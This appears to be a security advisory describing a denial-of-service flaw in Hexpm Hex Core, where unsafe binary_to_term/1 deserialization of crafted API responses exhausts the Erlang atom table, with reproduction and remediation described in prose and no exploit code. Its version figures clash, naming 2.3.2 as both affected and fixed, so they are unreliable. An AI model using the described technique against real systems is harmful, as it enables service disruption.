Hexpm Hex Core Uncontrolled Resource Consumption Vulnerability Allowing Object Injection

A vulnerability in the Hexpm Hex Core package, specifically in versions 2.3.0 through 2.3.2, has been identified. This issue arises from the deserialization of untrusted data in the Hex API module, which can lead to object injection and excessive resource allocation. The vulnerability allows for unsafe deserialization of Erlang terms, where the Hex client improperly handles binary data from the Hex API. This flaw can be exploited to exhaust the atom table, causing a denial-of-service by crashing the Erlang virtual machine.

Impact

Exploitation of this vulnerability can cause a denial-of-service by exhausting the atom table, leading to a crash of the Erlang virtual machine.

Reproduction

The vulnerability can be reproduced by sending a response from the Hex API that includes maliciously crafted binary data. This data should be designed to exploit the deserialization process in the Hex client, specifically targeting the `binary_to_term/1` function without the 'safe' option. Once the data is deserialized, it can cause atom table exhaustion, simulating a denial-of-service attack.

Remediation

Users can update to Hexpm Hex version 2.3.2, Hexpm Hex Core version 0.12.2, or Rebar3 version 3.27.0. Instructions for updating can be found in the respective repositories.